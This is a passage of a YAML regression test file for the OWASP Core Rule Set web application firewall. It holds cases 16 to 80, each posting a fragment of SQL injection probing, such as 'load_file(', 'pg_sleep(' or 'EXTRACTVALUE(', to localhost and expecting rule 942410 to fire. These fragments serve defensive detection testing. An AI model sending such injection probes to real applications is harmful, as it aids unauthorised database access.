+ data: "convert("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 16
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "cOnVeRt("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 17
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "COS("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 18
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "COUNT("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 19
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "CURRENT_USER("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 20
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "database ("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 21
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "date("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 22
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=date%5D%3D%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 23
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=day.+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 24
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=day%26%27%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 25
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=decode%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 26
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=default%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 27
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=ELT%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 28
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=encode%3D%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 29
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=ExtractValue%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 30
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=EXTRACTVALUE%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 31
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=floor%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 32
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=FLOOR+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 33
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=format%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 34
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=GROUP_CONCAT%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 35
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=hex%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 36
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=hEx%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 37
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=if+%21%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 38
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=if+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 39
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=if%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 40
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=if%5C%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 41
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=IFNULL%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 42
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=in+%27%24%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 43
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=IN+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 44
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=IN%2F%2A%2A%2F%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 45
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=insert%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 46
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=left%27%29%3F%24%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 47
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=LEFT%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 48
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=length%7C%7C%21%21%24%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 49
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=length%7C%7C%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 50
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=length%3F%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 51
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=length%26%26%21%21%21%24%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 52
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=length%26%26%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 53
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=LENGTH%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 54
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=ln+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 55
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=ln%29+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 56
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=load_file%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 57
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=local%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 58
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=log%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 59
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=log%26%26%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 60
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=lower%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 61
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=MAKE_SET%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 62
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=MAX%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 63
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=md5%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 64
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=md5%5C%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 65
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=MID%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 66
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=minute+%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 67
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=month%3D%28"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 68
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "name_const("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 69
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "now("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 70
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "nOW("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 71
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "ord("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 72
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "password?("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 73
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "password/?("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 74
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "Password>$("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 75
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pg_sleep("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 76
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pi("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 77
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "PI("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 78
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pow("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 79
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "POW("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 80
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
